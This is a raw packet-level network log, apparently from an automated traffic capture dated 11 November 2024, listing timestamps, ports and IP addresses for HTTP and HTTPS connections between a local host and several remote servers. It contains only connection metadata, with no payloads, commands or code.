Nov 11, 2024 10:33:26.654480934 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654500961 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654510975 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654536963 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654551983 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654565096 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654575109 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654582977 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654598951 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654609919 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654625893 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:26.654625893 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654625893 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654654980 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.654741049 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:26.676460028 CET	49858	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.681001902 CET	49857	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.681001902 CET	49859	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.681005955 CET	49860	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.681005955 CET	49862	443	192.168.2.5	23.209.72.25
Nov 11, 2024 10:33:26.725588083 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.725613117 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.725661993 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.725672007 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.727540016 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.733989000 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.734023094 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.734039068 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.734050989 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.734062910 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.734071016 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.734105110 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.734105110 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.735968113 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.735985041 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.736005068 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.736032963 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.736041069 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.736067057 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.737901926 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.737925053 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.737958908 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.737966061 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.737991095 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.744895935 CET	443	49848	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.780740023 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.794723988 CET	49848	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.794771910 CET	443	49848	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.794867992 CET	49848	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.806755066 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.806762934 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.806793928 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.806806087 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.806834936 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.806842089 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.806878090 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.806936026 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.814526081 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.814534903 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.814562082 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.814589977 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.814599037 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.814646959 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.814646959 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.814677000 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.814729929 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.815149069 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.815506935 CET	49856	443	192.168.2.5	4.150.155.223
Nov 11, 2024 10:33:26.815515041 CET	443	49856	4.150.155.223	192.168.2.5
Nov 11, 2024 10:33:26.848984957 CET	49872	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.849028111 CET	443	49872	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.849133015 CET	49872	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.851862907 CET	49872	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:26.851876974 CET	443	49872	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:26.918757915 CET	49873	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.918792963 CET	443	49873	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.918895960 CET	49873	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.919236898 CET	49873	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:26.919245005 CET	443	49873	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:26.945888996 CET	443	49867	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.945949078 CET	443	49868	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.947173119 CET	49867	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.947191954 CET	443	49867	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.948276043 CET	49867	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.948276997 CET	49868	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.948282957 CET	443	49867	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.948302031 CET	443	49868	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:26.948976994 CET	49868	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:26.948981047 CET	443	49868	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.024573088 CET	443	49869	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.038989067 CET	443	49870	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.039118052 CET	443	49871	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.041351080 CET	443	49867	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.041500092 CET	443	49868	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.041950941 CET	443	49868	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.041970015 CET	443	49867	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.042051077 CET	49868	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.042052984 CET	49867	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.048434973 CET	49869	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.048469067 CET	443	49869	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.052818060 CET	49868	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.052820921 CET	49869	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.052828074 CET	443	49869	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.052831888 CET	443	49868	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.068169117 CET	443	49865	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.069492102 CET	49865	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.069511890 CET	443	49865	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.070586920 CET	443	49865	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.070686102 CET	49865	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.075517893 CET	49870	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.075547934 CET	443	49870	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.075613022 CET	49865	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.075695992 CET	443	49865	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.076097012 CET	49865	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.076118946 CET	443	49865	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.076488972 CET	49865	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.076488018 CET	49871	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.076519966 CET	443	49871	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.076520920 CET	443	49865	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.076523066 CET	49870	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.076533079 CET	443	49870	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.076828957 CET	49867	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.076843977 CET	443	49867	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.076877117 CET	49867	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.076883078 CET	443	49867	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.078345060 CET	49871	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.078361034 CET	443	49871	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.083369970 CET	443	49866	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.083615065 CET	49866	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.083638906 CET	443	49866	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.084731102 CET	443	49866	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.084964037 CET	49866	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.085201025 CET	49866	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.085201025 CET	49866	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.085215092 CET	443	49866	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.085249901 CET	49866	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.085261106 CET	443	49866	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.090250969 CET	49874	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.090267897 CET	443	49874	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.090447903 CET	49874	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.090862989 CET	49874	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.090876102 CET	443	49874	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.091659069 CET	49875	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.091686964 CET	443	49875	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.091922045 CET	49875	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.092181921 CET	49875	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.092195988 CET	443	49875	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.141742945 CET	443	49869	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.141897917 CET	443	49869	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.144890070 CET	49869	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.154845953 CET	49869	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.154875994 CET	443	49869	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.154915094 CET	49869	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.154922009 CET	443	49869	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.159102917 CET	49876	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.159142017 CET	443	49876	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.159334898 CET	49876	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.159334898 CET	49877	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.159363031 CET	443	49877	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.159513950 CET	49877	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.159670115 CET	49878	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.159672022 CET	49879	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.159679890 CET	443	49879	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.159686089 CET	443	49878	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.159743071 CET	49879	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.159744024 CET	49878	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.160290003 CET	49880	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.160306931 CET	443	49880	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.160512924 CET	49880	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.160515070 CET	49876	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.160528898 CET	443	49876	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.160768986 CET	49877	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.160768986 CET	49878	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.160778999 CET	443	49878	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.160790920 CET	443	49877	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.161047935 CET	49879	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.161061049 CET	443	49879	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.161237001 CET	49880	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.161252022 CET	443	49880	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.164432049 CET	49865	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.165050983 CET	49881	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.165074110 CET	443	49881	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.165155888 CET	49881	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.165374041 CET	49881	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.165384054 CET	443	49881	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.165435076 CET	443	49870	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.165890932 CET	443	49870	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.165975094 CET	49870	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.165975094 CET	49870	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.166186094 CET	49870	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.166198015 CET	443	49870	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.167865992 CET	443	49871	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.167924881 CET	443	49871	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.168000937 CET	49871	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.168163061 CET	49871	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.168184042 CET	443	49871	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.168207884 CET	49871	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.168214083 CET	443	49871	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.168530941 CET	49882	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.168555021 CET	443	49882	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.168725967 CET	49882	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.169204950 CET	49882	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.169218063 CET	443	49882	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.170953989 CET	49883	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.170963049 CET	443	49883	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.171278954 CET	49883	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.172435045 CET	49883	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.172444105 CET	443	49883	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.188353062 CET	49866	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.188380003 CET	443	49866	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.317873955 CET	443	49866	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.317961931 CET	49866	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.319031954 CET	49866	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.319052935 CET	443	49866	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.367819071 CET	443	49872	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.368128061 CET	49872	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.368145943 CET	443	49872	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.368433952 CET	443	49872	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.368810892 CET	49872	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.368869066 CET	443	49872	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.368973017 CET	49872	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.382481098 CET	443	49865	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.383369923 CET	49865	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.383431911 CET	443	49865	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.383589983 CET	443	49865	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.383647919 CET	49865	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.383661985 CET	49865	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.415323019 CET	443	49872	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.609918118 CET	443	49874	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.610250950 CET	443	49875	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.617047071 CET	49874	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.617078066 CET	443	49874	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.617561102 CET	49874	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.617568016 CET	443	49874	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.617875099 CET	49875	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.617908001 CET	443	49875	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.618288040 CET	49875	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.618299007 CET	443	49875	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.636287928 CET	443	49873	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.636703968 CET	49873	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.636730909 CET	443	49873	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.637799978 CET	443	49873	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.637872934 CET	49873	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.638231039 CET	49873	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.638293028 CET	443	49873	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.638427019 CET	49873	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.638470888 CET	49873	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.638483047 CET	443	49873	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.677457094 CET	443	49879	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.678399086 CET	443	49880	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.678606987 CET	443	49877	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.678939104 CET	49879	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.678958893 CET	443	49879	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.679050922 CET	443	49876	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.679100037 CET	49880	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.679111958 CET	443	49880	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.679119110 CET	443	49878	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.679280043 CET	49877	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.679290056 CET	443	49877	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.679393053 CET	49876	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.679410934 CET	443	49876	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.679507017 CET	49878	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.679513931 CET	443	49878	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.679847956 CET	443	49876	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.680095911 CET	443	49879	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.680150986 CET	443	49880	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.680170059 CET	49879	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.680214882 CET	49880	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.680388927 CET	443	49877	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.680438042 CET	49877	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.680581093 CET	49880	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.680634022 CET	443	49880	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.680731058 CET	443	49878	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.680794001 CET	49878	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.680895090 CET	49876	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.680974007 CET	443	49876	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.681173086 CET	49879	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.681242943 CET	443	49879	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.681442976 CET	49877	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.681509972 CET	443	49877	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.681781054 CET	49878	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.681850910 CET	443	49878	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.681920052 CET	49880	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.681926966 CET	443	49880	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.682025909 CET	49876	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.682041883 CET	49879	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.682049990 CET	443	49879	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.682087898 CET	49877	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.682096004 CET	443	49877	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.682171106 CET	49878	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.682179928 CET	443	49878	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.687335014 CET	49873	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.690951109 CET	443	49881	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.692404985 CET	443	49883	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.692661047 CET	443	49882	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.696671009 CET	49881	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.696698904 CET	443	49881	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.697326899 CET	49881	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.697331905 CET	443	49881	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.701077938 CET	49883	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.701088905 CET	443	49883	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.701515913 CET	49883	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.701520920 CET	443	49883	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.701875925 CET	49882	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.701890945 CET	443	49882	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.702287912 CET	49882	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.702291965 CET	443	49882	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.706584930 CET	443	49875	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.706767082 CET	443	49875	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.706845045 CET	49875	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.707010031 CET	49875	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.707027912 CET	443	49875	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.707039118 CET	49875	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.707045078 CET	443	49875	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.707324028 CET	443	49874	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.707691908 CET	443	49874	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.707750082 CET	49874	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.707897902 CET	49874	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.707912922 CET	443	49874	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.707918882 CET	49874	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.707923889 CET	443	49874	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.709872961 CET	49884	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.709906101 CET	443	49884	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.709980011 CET	49884	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.710146904 CET	49884	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.710165024 CET	443	49884	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.711333990 CET	49885	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.711364985 CET	443	49885	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.712474108 CET	49885	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.712821960 CET	49885	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.712840080 CET	443	49885	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.723335028 CET	443	49876	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.773020983 CET	443	49880	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.773087978 CET	49880	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.773113966 CET	443	49880	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.773175001 CET	443	49880	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.773297071 CET	49880	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.773516893 CET	443	49878	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.773585081 CET	49878	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.773597956 CET	443	49878	13.107.246.40	192.168.2.5
